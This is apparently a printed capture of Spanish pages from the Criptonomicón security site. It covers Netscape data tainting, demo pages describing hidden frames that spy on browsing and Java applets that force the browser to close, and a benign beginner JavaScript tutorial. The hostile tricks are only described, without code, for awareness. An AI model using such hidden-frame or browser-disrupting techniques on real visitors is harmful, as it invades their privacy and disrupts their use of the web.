puede pasar estos valores marcados a otro servidor sin el permiso del usuario.
Cuando se deshabilita el marcado de datos, un script no puede acceder ninguna
propiedad de una ventana en otros servidor. Puedes comprobarlo en el
siguiente ejemplo.
Para habilitar el marcado de datos, el usuario final debe declarar la variable de

file:///C|/TEMP/criptonomicon/criptonomicon/tainting.html (1 of 2) [25/10/2000 02:33:21 p.m.]

Marcado de Datos (Data Tainting)


Consejos prcticos

entorno NS_ENABLE_TAINT, ponindola a cualquier valor, p.e. a "1".

Referencias

Cmo marcar y desmarcar elementos de datos


individuales

Libro de Visitas

Puedes controlar el marcado de elementos de datos (propiedades, variables,


funciones, objetos) mediante dos funciones:
taint aade marcado a un elemento de datos, y
untaint elimina el marcado de un elemento de datos.
Ambas funciones toman un solo elemento de datos como argumento.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/tainting.html (2 of 2) [25/10/2000 02:33:21 p.m.]

Ejemplo de Marcado de Datos (Data Tainting)

Volver a la seccin de agujeros

Pgina inocente
Esta podra ser una pgina inocente a la que t accedes desde alguna otra de mi Web. Aqu el frame de
arriba es tan grande que lo puedes ver, pero podra hacerlo tan pequeo que no apreciases su presencia.
Desde el frame de arriba podra ir monitorizando tu actividad o incluso obligarte a abrir pginas en otros
frames invisibles con datos de tu disco duro, tu historial de navegacin, etc.
Desde aqu puedes acceder a otras pginas, y jugando con los botones del frame de arriba y en el
elemento desplegable de navegacin, puedes comprobar lo que est permitido y lo que no.
Pgina de Gonzalo
Criptonomicn

file:///C|/TEMP/criptonomicon/criptonomicon/ejemplotainting.html [25/10/2000 02:33:22 p.m.]

Qu perrito tan mono!

Qu perrito tan mono!


Suscripcin gratis

Intimidad?

Artculos

Si tienes encendido el altavoz, habrs notado una molestia, verdad? Lo mejor es que
te persigue all donde vayas, aunque cierres esta ventana se seguir oyendo si tienes
otras abiertas. La nica forma de escapar del feroz perro es cerrar el navegador (o
apagar el altavoz). Estrictamente hablando, esta applet de Java no cuelga tu
navegador, pero te obliga a cerrarlo (o a prescindir de los altavoces). Si usas un
escritorio integrado con el navegador, la nica forma de librarte del ruido es... cerrar
el ordenador o apagar el altavoz! He aqu un sencillo ejemplo de applet maliciosa.

Seguridad

Linux

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Navegacin segura

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/crashes/perrazo.html (1 of 2) [25/10/2000 02:33:28 p.m.]

Qu perrito tan mono!


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/crashes/perrazo.html (2 of 2) [25/10/2000 02:33:28 p.m.]

Colgando el navegador (otra vez)

Est pasando algo?


Suscripcin gratis

No te das cuenta de nada, verdad? En cualquier caso ya es tarde y tendrs que cerrar
esta ventana de tu navegador (si puedes).
No debes de tener Java instalado. Qu aburrido eres!

Intimidad?

Artculos
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Seguridad

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/crashes/hilos.html (1 of 2) [25/10/2000 02:33:28 p.m.]

Colgando el navegador (otra vez)


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/crashes/hilos.html (2 of 2) [25/10/2000 02:33:28 p.m.]

Colgando el navegador

Est pasando algo?


Suscripcin gratis

No te das cuenta de nada, verdad? En cualquier caso ya es tarde y tendrs que cerrar
esta ventana de tu navegador.
No debes de tener Java instalado. Qu aburrido eres!

Intimidad?

Artculos
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Seguridad

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/crashes/colgar.html (1 of 2) [25/10/2000 02:33:28 p.m.]

Colgando el navegador
Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/crashes/colgar.html (2 of 2) [25/10/2000 02:33:28 p.m.]

Te mereces un premio por perseverante

Bravo, te ha costado, pero has llegado!


Est bien, est bien. Si has llegado hasta aqu, un pequeo truco:
Suscripcin gratis

Intimidad?

Artculos

Pasa el ratn por aqu o por la imagen!


No debes de tener Java instalado. Qu aburrido eres!

Seguridad
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Linux
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/crashes/insidioso.html (1 of 2) [25/10/2000 02:33:28 p.m.]

Te mereces un premio por perseverante


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/crashes/insidioso.html (2 of 2) [25/10/2000 02:33:28 p.m.]

Cmo aadir JavaScript dentro de una pgina web

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Aadir JavaScript a una pgina


Existen diversos mtodos para aadir guiones y funciones en
JavaScript a una pgina web convencional. En este curso se
describirn las tres siguientes:

Aadir JavaScript a
una pgina

Abrir y cerrar ventanas


Navegacin segura

Control de acceso

Mediante la etiqueta <SCRIPT>


Constituye la forma estndar de incluir funciones escritas en
JavaScript:

Escribir en la ventana
actual

Validar formularios
CGI

Java

JavaScript

Cookies

Crashes

<SCRIPT LANGUAGE="JavaScript">
<!-- Cdigo en JavaScript //-->
</SCRIPT>
Cuando el navegador va interpretando la pgina en HTML, al
llegar a esta etiqueta sabe que lo que est encerrado entre
<SCRIPT> y </SCRIPT> constituye cdigo JavaScript y lo
ejecutar como corresponda. Cuando se crean funciones y
variables que se utilizan en varios puntos de la pgina web, se
suelen definir al principio de la pgina, entre las etiquetas
<HEAD>.

Cambiar imgenes
dinmicamente

Clculos matemticos

Cookies

La barra de estado

Men de navegacin

Agujeros

Como un URL

Spam

Remailers

Tambin se pueden incluir sentencias de JavaScript, como argumentos de la etiqueta


HREF, que sern evaluadas dinmicamente cuando el usuario pinche sobre un enlace
o simplemente pase el ratn sobre l.

Anonimato

En respuesta a eventos

Correo seguro

Los eventos disparan acciones programadas en JavaScript dentro de la pgina HTML


como resultado de alguna accin del usuario, como pulsar un botn o deslizar el
ratn sobre una imagen.

Web seguro

Susurros desde la Cripta

Ms adelante, a medida que se vaya avanzando, se desarrollarn varios ejemplos de


los tres mtodos citados.

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/javascript.html (1 of 2) [25/10/2000 02:33:43 p.m.]

Cmo aadir JavaScript dentro de una pgina web


Consejos prcticos

Referencias

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Libro de Visitas

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/javascript.html (2 of 2) [25/10/2000 02:33:43 p.m.]

Cmo abrir y cerrar distintas ventanas

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Abriendo y cerrando ventanas


Todo programador que se precie, cuando se adentra en un nuevo
lenguaje, escribe siempre un primer programa que produce una
salida con un saludo al mundo. En JavaScript existen varias
formas de hacerlo, con diversos niveles de sofisticacin. El ms
sencillo consiste en crear una ventana de alerta con el mensaje
deseado:
alert( "Hola, mundo!" );
Si esta sentencia se incluye entre las etiquetas <SCRIPT> en
cualquier lugar de una pgina web, se presentar una ventana con
el mensaje "Hola, mundo!". Pulsando en el botn de Aceptar, se
cerrar, sin afectar al contenido del resto de la pgina. Te habrs
fijado que cuando has entrado en esta pgina, apareci esa ventana
sin t hacer nada. Puedes examinar si quieres el cdigo fuente de
la pgina para ver cmo se hizo.
Tambin puede aadirse como atributo de la etiqueta HREF, de
manera que aparezca la ventana al seguir un enlace:

Crashes

Agujeros

Quiero ver la <a


href="javascript:alert('Hola,
mundo');">ventana</a>.

Aadir JavaScript a una


pgina
Abrir y cerrar
ventanas
Escribir en la ventana
actual

Validar formularios
Cambiar imgenes
dinmicamente

Clculos matemticos

Cookies

La barra de estado
Men de navegacin

Spam

Por ltimo, se puede hacer que al pulsar un botn presente en la pgina web (es decir,
en respuesta al evento onClick del botn), aparezca igualmente la consabida ventana:

Remailers

<input type="button" value="Mostrar ventana"


onClick="alert('Hola, mundo!');">

Anonimato

Correo seguro

Adems de las ventanas de alerta, JavaScript proporciona otros dos tipos ms, que
permiten interactuar con el visitante:

Web seguro

prompt presenta una ventana con un mensaje y un recuadro de texto donde el


usuario introduce aquello que se le pide. La cadena tecleada por el usuario puede
almacenarse en una variable para su uso futuro.

Susurros desde la Cripta

nombre = prompt('Introduce tu nombre', 'Desconocido');

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/abrirycerrar.html (1 of 3) [25/10/2000 02:33:43 p.m.]

Cmo abrir y cerrar distintas ventanas


Consejos prcticos

Referencias

confirm presenta una ventana con un mensaje y dos botones, Aceptar y Cancelar,
que el usuario pulsar en funcin del contenido del mensaje. Si el usuario pulsa
Aceptar, confirm devuelve un valor Verdadero (TRUE), mientras que si pulsa
Cancelar, devuelve un valor Falso (FALSE), que puede ser utilizado por el guin en
JavaScript para decidir que accin ejecutar a continuacin.

Libro de Visitas

if (confirm('Desea continuar?'))
// se ejecuta una accin
else
// se ejecuta otra
Tambin es posible abrir nuevas ventanas del navegador con el mtodo open del
objeto window:
nuevaVentana=window.open("ventananav.html");
donde nuevaVentana es el identificador de un nuevo objeto window que identifica a
la ventana recin creada, en la que se habr cargado la pgina ventananav.html.
Algunos de los parmetros que se pueden controlar al abrir la nueva ventana, cuyos
posibles valores pueden ser yes o no, son:
directories: si su valor es yes, crea los botones de directorio estndar del
navegador, tales como What's New y What's Cool en Netscape.
height: especifica la altura en pixels de la ventana creada.
menubar: si su valor es yes, crea una barra de men en la parte superior de la
ventana.
resizable: si su valor es yes, permite al usuario cambiar el tamao de la
ventana.
scrollbars: si su valor es yes, crea barras de desplazamiento vertical y
horizontal cuando el tamao del documento sea mayor que el de la ventana.
status: si su valor es yes, crea una barra de estado en la parte inferior de la
ventana.
toolbar: si su valor es yes, crea una barra de herramientas estndar con
botones.
width: especifica la anchura en pixels de la ventana creada.
A su vez, las ventanas se pueden cerrar utilizando cualquiera de los siguientes tres
mtodos:
window.close()
self.close()
close()
Eso s, el ltimo de ellos no debe usarse en un gestor de eventos. As, por ejemplo,
para cerrar la ventana anterior, podra hacerse:
nuevaVentana.close();

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/abrirycerrar.html (2 of 3) [25/10/2000 02:33:43 p.m.]

Cmo abrir y cerrar distintas ventanas

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/abrirycerrar.html (3 of 3) [25/10/2000 02:33:43 p.m.]

Cmo escribir en la ventana actual

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Escribir en la ventana actual


Ahora que se ha visto cmo abrir y cerrar ventanas, se proceder a
explicar cmo escribir texto de manera dinmica dentro de una
pgina web.
Como ya se dijo, JavaScript es un lenguaje basado en objetos,
siendo el objeto window, visto ya en la seccin anterior, el que se
encuentra a la raz de todos ellos. Por debajo de l se encuentran
todos los dems, como el objeto document, que contiene
informacin sobre el documento actual y proporciona los mtodos
o funciones que permiten mostrar una salida al usuario. En
concreto, el mtodo write escribe una o ms expresiones HTML
en un documento en la ventana especificada.
Por ejemplo, para escribir el mensaje "Hola, mundo!" dentro de
la pgina web bastara con utilizar la siguiente lnea de cdigo:
document.write( "Hola, mundo!" );

Aadir JavaScript a una


pgina

Abrir y cerrar ventanas


Escribir en la ventana
actual

Validar formularios
Cambiar imgenes
dinmicamente

Clculos matemticos

Cookies

Cookies

Crashes

Agujeros

en el lugar en el que se quisiera que apareciera el mensaje (por


supuesto, encerrada entre las etiquetas <SRIPT>, como ya se
explic).

La barra de estado

Men de navegacin

Remailers

Evidentemente, escribir directamente el texto de esta forma no


presenta ninguna ventaja respecto a utilizar una lnea convencional en HTML. La
verdadera utilidad radica en poder utilizar variables y funciones de manera que el
texto cambie dinmicamente. A continuacin se vern dos ejemplos: cmo incluir
informacin sobre el navegador del usuario y cmo incluir la fecha.

Anonimato

Cmo escribir datos del usuario

Spam

Correo seguro

Web seguro

Susurros desde la Cripta

El objeto navigator posee propiedades o variables para almacenar el nombre y


versin del navegador usado, los tipos MIME soportados por el cliente y los plug-in
instalados en el cliente. La propiedad appName contiene el nombre del navegador,
mientras que la propiedad appVersion almacena informacin sobre su versin.
Usando estas propiedades se le puede mandar al usuario un mensaje indicndole el
navegador que usa y su versin:

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/escribirenventana.html (1 of 3) [25/10/2000 02:33:44 p.m.]

Cmo escribir en la ventana actual


Consejos prcticos

Referencias

Libro de Visitas

document.write( "Utilizas el navegador " +


navigator.appName + ", versin " + navigator.appVersion
+ "." );
La utilidad de estas funciones radica sobre todo en la posibilidad de mostrar la pgina
de una manera u otra en funcin del tipo y versin del navegador del usuario.

Cmo escribir la fecha actual


Es muy comn encontrarse la fecha del da en pginas web de peridicos y otros
servicios de informacin. En lugar de tener que escribirla y cambiarla manualmente
cada da a las 00.00, resulta mucho ms cmodo y eficiente escribir un sencillo guin
que se encargue automticamente de la tarea.
Para gestionar fechas y horas se utiliza el objeto Date. Cuando no se le proporcionan
argumentos a su constructor, ste devuelve la fecha y hora en el momento en que se
le invoc:
ahora = new Date();
almacenndose la fecha y hora actuales en ahora. Se puede acceder a los distintos
componentes de la fecha y hora por medio de mtodos como los siguientes:
getDate: devuelve el da del mes (valor entero entre 1 y 31) para la fecha
especificada.
getDay: devuelve el da de la semana (0 para Domingo, 1 para Sbado, etc.)
para la fecha especificada.
getHours: devuelve la hora (valor entero entre 0 y 23) para la fecha
especificada.
getMinutes: devuelve los minutos (valor entero entre 0 y 59) para la fecha
especificada.
getMonth: devuelve el mes (valor entero entre 0 y 11) para la fecha
especificada.
getSeconds: devuelve los segundos (valor entero entre 0 y 59) para la fecha
especificada.
getTime: devuelve un valor numrico (nmero de milisegundos transcurridos
desde el 1 de enero de 1970 a las 00.00) correspondiente a la hora para la fecha
especificada.
getYear: devuelve el ao para la fecha especificada.
Utilizando estos mtodos, se puede construir una funcin que devuelva la fecha
actual:

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/escribirenventana.html (2 of 3) [25/10/2000 02:33:44 p.m.]

Cmo escribir en la ventana actual

function fechahoy() {
var diasemana = new Array('Domingo', 'Lunes',
'Martes', 'Mircoles', 'Jueves', 'Viernes', 'Sbado');
var nombremes = new Array('enero', 'febrero', 'marzo',
'abril', 'mayo', 'junio', 'julio', 'agosto',
'septiembre', 'octubre', 'noviembre', 'diciembre');
var ahora;
var fecha = new Date();
var anio = fecha.getYear();
var mes = fecha.getMonth();
var dia = fecha.getDay();
var num = fecha.getDate();
ahora = diasemana[dia] + ", " + num + " " +
nombremes[mes] + " " + anio;
return ahora;
}
Esta funcin devuelve una cadena con el da de la semana, seguido del da del mes, el
mes y el ao. La funcin se puede invocar en cualquier lugar de la pgina web y
presentar su salida utilizando el mtodo write del objeto document:
document.write( "Hoy es " + fechahoy() );

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/escribirenventana.html (3 of 3) [25/10/2000 02:33:44 p.m.]

Cmo validar formularios en busca de errores

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Validar formularios
Los formularios representan una forma rpida y eficaz de enviar
informacin desde el ordenador del usuario hasta el servidor web.
Generalmente, constan de varios campos de texto, botones de
seleccin y listas desplegables, que el usuario rellena
convenientemente y transmite al servidor pulsando finalmente en
un botn de envo. A menudo, muchos de los campos que el
usuario debe completar obedecen a un formato determinado, por
lo que conviene que el usuario los rellene correctamente para
evitar errores al procesar en el servidor los datos recibidos.
JavaScript constituye una manera muy conveniente de trasladar
esta labor de validacin de la informacin al ordenador del cliente,
descargando as al servidor de esta tarea.

Aadir JavaScript a una

En JavaScript, los formularios son objetos form, que dependen a


su vez del objeto document. Cuando se crea el formulario
utilizando la etiqueta <FORM> de HTML, conviene darle un
nombre para poder referenciarlo cmodamente ms adelante
desde funciones de JavaScript. Asimismo, todos los elementos del
formulario, botones, cuadros de texto, listas, etc., deberan ser
nombrados por la misma razn. JavaScript se aade a los
elementos convencionales del formulario en la forma de gestores
de eventos.

Clculos matemticos

pgina

Abrir y cerrar ventanas


Escribir en la ventana
actual

Validar formularios
Cambiar imgenes
dinmicamente

Cookies

La barra de estado

Men de navegacin

En primer lugar, se crea el formulario de manera normal, usando las etiquetas HTML
convencionales. En la pgina de ejemplo aparece el formulario cuyo cdigo se lista a
continuacin:
<form method = "POST" name = "registro" onSubmit =
"return validar(this)" action = "formularios.asp">
Nombre: <input type="text" name="nombre" size="20">
Edad: <input type="text" name="edad" size="2">
Direccin de correo: <input type="text" name="correo"
size="20">
<input type="submit" value="Enviar datos" name="enviar">
</form>

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/validarformularios.html (1 of 3) [25/10/2000 02:33:44 p.m.]

Cmo validar formularios en busca de errores


Consejos prcticos

Referencias

Libro de Visitas

que consta de tres campos de entrada y un botn para enviar los datos. Se ha aadido
el evento onSubmit, que se produce cuando el usuario pulsa el botn Enviar datos, de
manera que se invoca a la funcin validar antes de transmitir nada. El argumento que
toma es this, es decir, el propio formulario. A continuacin se presenta el cdigo de
dicha funcin:
function validar(formulario) {
if (formulario.nombre.value.length < 4) {
alert("Escriba por lo menos 4 caracteres en el campo
\"Nombre\".");
formulario.nombre.focus();
return (false);
}
var checkOK = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +
"abcdefghijklmnopqrstuvwxyz ";
var checkStr = formulario.nombre.value;
var allValid = true;
for (i = 0; i < checkStr.length; i++) {
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length) {
allValid = false;
break;
}
}
if (!allValid) {
alert("Escriba slo letras en el campo
\"Nombre\".");
formulario.nombre.focus();
return (false);
}
var checkOK = "0123456789";
var checkStr = formulario.edad.value;
var allValid = true;
var decPoints = 0;
var allNum = "";
for (i = 0; i < checkStr.length; i++) {
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length) {
allValid = false;
break;
}

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/validarformularios.html (2 of 3) [25/10/2000 02:33:44 p.m.]

Cmo validar formularios en busca de errores

allNum += ch;
}
if (!allValid) {
alert("Escriba slo dgitos en el campo \"Edad\".");
formulario.edad.focus();
return (false);
}
var chkVal = allNum;
var prsVal = parseInt(allNum);
if (chkVal != "" && !(prsVal >= "18" && prsVal <=
"30")) {
alert("Escriba un valor mayor o igual que 18 y menor
o igual que 30 en el campo \"Edad\".");
formulario.edad.focus();
return (false);
}
if ((formulario.correo.value.indexOf ('@', 0) ==
-1)||(formulario.correo.value.length < 5)) {
alert("Escriba una direccin de correo vlida en el
campo \"Direccin de correo\".");
return (false);
}
return (true);
}
Esta funcin realiza las siguientes comprobaciones:
1. La longitud del nombre es mayor de cuatro caracteres.
2. El nombre slo contiene caracteres del alfabeto espaol, no contiene nmeros
ni caracteres no alfanumricos.
3. La edad slo contiene nmeros.
4. El valor de la edad est comprendido entre 18 y 30.
5. La direccin de correo incluye una arroba y su longitud es superior a cinco
caracteres.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/validarformularios.html (3 of 3) [25/10/2000 02:33:44 p.m.]

Cmo cambiar dinmicamente las imgnes de una pgina

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Cambiar imgenes dinmicamente


Una de las aplicaciones ms extendidas y vistosas de JavaScript
dentro de una pgina web es el famoso efecto de cambiar la
imagen cuando el ratn se desliza sobre ella, por ejemplo en los
mens de opciones. Para aprender a realizar este efecto es
necesario comprender antes cmo se acceden y manipulan las
imgenes en JavaScript. Cada imagen insertada con la etiqueta
<IMG> en una pgina se corresponde con un objeto Image.
Adems, se crea un array llamado images que contiene
secuencialmente, segn el orden de insercin en la pgina, todas
las imgenes de sta. As pues, una primera forma de referenciar
las imgenes en una pgina sera mediante este array:
document.images[0] //para la primera imagen
del documento
document.images[1] //para la segunda imagen
del documento
etc.

Aadir JavaScript a una


pgina

Abrir y cerrar ventanas


Escribir en la ventana
actual

Validar formularios
Cambiar imgenes
dinmicamente

Clculos matemticos

Cookies

La barra de estado
Crashes

Agujeros

Spam

Ahora bien, si a la hora de insertar una imagen en una pgina se le


da un nombre, ste permitir referenciarla ms cmodamente por
este nombre. Por ejemplo, la imagen

Men de navegacin

<img name="castillo" src="fotocastillo.gif"


width="110" height="80">
puede referenciarse desde una sentencia de JavaScript como:

Remailers

Anonimato

Correo seguro

Web seguro

document.images["castillo"]
Cuando se generan los efectos de cambio de imagen, deben cargarse adems de las
imgenes que ya estn en la pgina, las que las sustituirn cuando el ratn pase sobre
ellas. Para ello se utiliza lo que se llama precarga de imgenes: cargar una imagen en
el cach de manera que cuando sea necesaria se visualice inmediatamente en la
pgina. La precarga se realiza antes de cargar los contenidos del documento, entre las
etiquetas <HEAD>:

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/cambiarimagenes.html (1 of 3) [25/10/2000 02:33:45 p.m.]

Cmo cambiar dinmicamente las imgnes de una pgina


Consejos prcticos

Referencias

Libro de Visitas

boton1_on = new Image();


boton1_on.src = "boton1b.gif";
boton1_off = new Image();
boton1_off.src = "boton1.gif";
El constructor del objeto Image crea primero una instancia de la imagen boton1_on, a
la que posteriormente le asigna la foto del fichero boton1b.gif. De esta manera, ya ha
quedado cargada la imagen en memoria para ser visualizada instantneamente en
cuanto se le invoque. Lo mismo ocurre para la segunda imagen.
Ya slo queda cambiar la imagen cuando el ratn se deslice sobre ella. Para lograr
este efecto se utilizan los eventos onMouseover y onMouseout. El primero se
produce cuando el ratn pasa sobre un objeto, mientras que el segundo tiene lugar
cuando el ratn abandona el rea del objeto:
<a href = "presentacion.html" onmouseover =
"document.images['boton1'].src = boton1_on.src"
onmouseout = "document.images['boton1'].src =
boton1_off.src"><img src = "boton1.gif" name =
"boton1"></a>
Se estn definiendo los gestores de ambos eventos, de manera que cuando el ratn
pase sobre la imagen boton1.gif, que a su vez enlaza con la pgina web
presentacion.html, se cargue la imagen boton1_on, que como se defini en la
precarga, se corresponde con el fichero boton1b.gif. Cuando el ratn salga del rea
ocupada por la imagen, entonces se cargar la imagen boton1_off, que se
corresponde con el fichero boton1.gif.
Como resultara muy farragoso tener que escribir todas esas sentencias cada vez para
cada hipervnculo, pueden crearse algunas funciones que simplifiquen el trabajo:
<html>
<head>
<title>Cambio dinmico de imgenes</title>
<script language="Javascript">
<!-// Precarga de imgenes
if (document.images) {
var boton1_off = new Image();
boton1_off.src = "imagenes/boton1.gif";
var boton1_on = new Image();
boton1_on.src = "imagenes/boton1b.gif";
}
// Carga de imagen cuando el ratn pasa por encima
function entra(boton) {
if (document.images) {
if (boton == 'boton1') {

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/cambiarimagenes.html (2 of 3) [25/10/2000 02:33:45 p.m.]

Cmo cambiar dinmicamente las imgnes de una pgina

document.images[boton].src = boton1_on.src;
}
}
}
// Carga de imagen cuando el ratn abandona el rea de
la imagen
function sale(boton) {
if (document.images) {
if (boton == 'boton1') {
document.images[boton].src = boton1_off.src;
}
}
}
//--> </script>
</head>
<body>
<p><
a href = "suscripcion.html" onMouseOver =
"entra('boton1');" onMouseOut = "sale('boton1');"><img
src="imagenes/boton1.gif" alt="Presentacin" border="0"
name="boton1" WIDTH="150" HEIGHT="30"></a> </p>
</body>
</html>
Este proceso puede repetirse para tantas imgenes como aparezcan en la pgina web.
En la figura ms abajo se muestra el resultado.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/cambiarimagenes.html (3 of 3) [25/10/2000 02:33:45 p.m.]

Cmo realizar clculos matemticos sencillos

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

Cmo realizar clculos matemticos


sencillos
JavaScript incorpora el objeto Math, que proporciona propiedades
y mtodos para realizar funciones matemticas y operar con
constantes numricas, como funciones trigonomtricas,
logaritmos, potencias, etc. En la tabla se listan los mtodos
proporcionados por Math.

Math.sin(3*Math.PI/4);
Math.cos(3*Math.PI/4);

Java

JavaScript

Cookies

Crashes

Cuando se van a utilizar varias funciones o constantes


matemticas, se puede evitar el tener que poner cada vez Math. de
la siguiente manera:
with (Math) {
a = PI * r*r;
y = r*sin(theta);
x = r*cos(theta)
}

Agujeros

Spam

Remailers

pgina

Abrir y cerrar ventanas


Escribir en la ventana

Por ejemplo, el seno y coseno de 3p/4 se calcularan como:


CGI

Aadir JavaScript a una

actual

Validar formularios
Cambiar imgenes
dinmicamente

Clculos matemticos

Cookies

La barra de estado

Men de navegacin

A continuacin se presenta una sencilla calculadora del Euro,


capaz de convertir cantidades en pesetas a euros y viceversa. Este
ejemplo podra combinarse con el de validacin de entrada de datos en formularios,
para asegurarse de que se introducen valores numricos vlidos en las casillas. Se
deja como ejercicio para el lector.

Anonimato

Correo seguro
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Web seguro

Susurros desde la Cripta

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/calculosmatematicos.html (1 of 2) [25/10/2000 02:33:45 p.m.]

Cmo realizar clculos matemticos sencillos


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/calculosmatematicos.html (2 of 2) [25/10/2000 02:33:45 p.m.]

Cmo escribir mensajes en la barra de estado

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

Cmo escribir mensajes en la barra de


estado
La barra de estado que aparece en la parte inferior de la ventana
del navegador puede contener mensajes informativos
configurados por el diseador, como por ejemplo una breve
descripcin de lo que puede encontrarse si se sigue un enlace.
Existen dos propiedades del objeto window para manipular el
valor de la barra de estado:
defaultStatus: establece el mensaje que se visualizar por
defecto cuando no hay nada ms en la barra de estado.
status: especifica una prioridad o un mensaje transitorio en
la barra de estado, que tiene preferencia sobre el valor
